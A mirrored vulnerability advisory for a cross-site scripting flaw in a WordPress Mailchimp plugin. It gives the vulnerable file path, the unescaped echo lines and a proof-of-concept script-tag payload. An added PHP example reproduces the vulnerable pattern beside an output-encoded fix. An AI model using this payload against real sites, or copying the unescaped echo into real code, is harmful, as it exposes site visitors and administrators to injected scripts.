Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020020105

Below is a copy:

WordPress plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Title  : WordPress plugin yikes-inc-easy-mailchimp-extender 6.6.2 - Cross Site Scripting
[-] Author : MEHRAN_FEIZI
[-] Vendor : https://wordpress.org/plugins/yikes-inc-easy-mailchimp-extender/
[-] Category : Webapps
[-] Date : 2020-02-20
==============================================================================================
Vulnerable Page:
yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php
==============================================================================================
Vulnerable Source:
2: $form_data['field_name'] = $_POST['field_name'];
36: echo $form_data['field_name'];
50: echo $form_data['field_type'];
===============================================================================================
POC :
http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

Step 1 = Go to the web page: http://localhost/wp-content/plugins/yikes-inc-easy-mailchimp-extender/admin/partials/ajax/add_field_to_form.php

Step 2 = Find the input boxes "field_name" and "field_type"

Step 3 = In the input box, add JavaScript code: <script>alert('XSS')</script>
===============================================================================================
************************
* ==> Contact Us :
* Telegram : @MF0584
* Email : [email protected]
************************
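
The echo pattern listed under "Vulnerable Source", next to an output-encoded version, as an added example that is not the plugin's code or the vendor's fix. The surrounding markup, the function names and the allowed-type list are hypothetical; only the two request fields and the test string come from the advisory.

```php
<?php
// Added illustration, not the plugin's code. The markup is hypothetical;
// only the two echoed request fields come from the advisory.

// Pattern from the advisory: request data written to the page as-is.
function render_field_vulnerable(array $post): string {
    $form_data = array();
    $form_data['field_name'] = $post['field_name'] ?? '';
    $form_data['field_type'] = $post['field_type'] ?? '';
    return '<label>' . $form_data['field_name'] . '</label>'
         . '<input type="' . $form_data['field_type'] . '">';
}

// Allow-list for the type attribute (constructed list, an assumption).
const ALLOWED_FIELD_TYPES = array('text', 'email', 'number', 'url', 'date');

function esc(string $value): string {
    // Encode &, <, >, " and ' so the value stays inside its text or
    // attribute context instead of being parsed as markup.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_field_hardened(array $post): string {
    // Reject non-string input (e.g. field_name[]=x) before using it.
    $name = is_string($post['field_name'] ?? null) ? $post['field_name'] : '';
    $type = is_string($post['field_type'] ?? null) ? $post['field_type'] : '';
    if (!in_array($type, ALLOWED_FIELD_TYPES, true)) {
        $type = 'text'; // fall back rather than reflect an unknown value
    }
    return '<label>' . esc($name) . '</label>'
         . '<input type="' . esc($type) . '">';
}

// Constructed request body using the test string from the advisory.
$post = array(
    'field_name' => "<script>alert('XSS')</script>",
    'field_type' => "<script>alert('XSS')</script>",
);

echo render_field_vulnerable($post), PHP_EOL; // markup reaches the page intact
echo render_field_hardened($post), PHP_EOL;   // markup is shown as inert text
```

Inside WordPress the same encoding is done with the core functions `esc_html()` and `esc_attr()`. Because the URL in the POC requests the partial directly, a guard such as `defined( 'ABSPATH' ) || exit;` at the top of the file also keeps it from running outside WordPress.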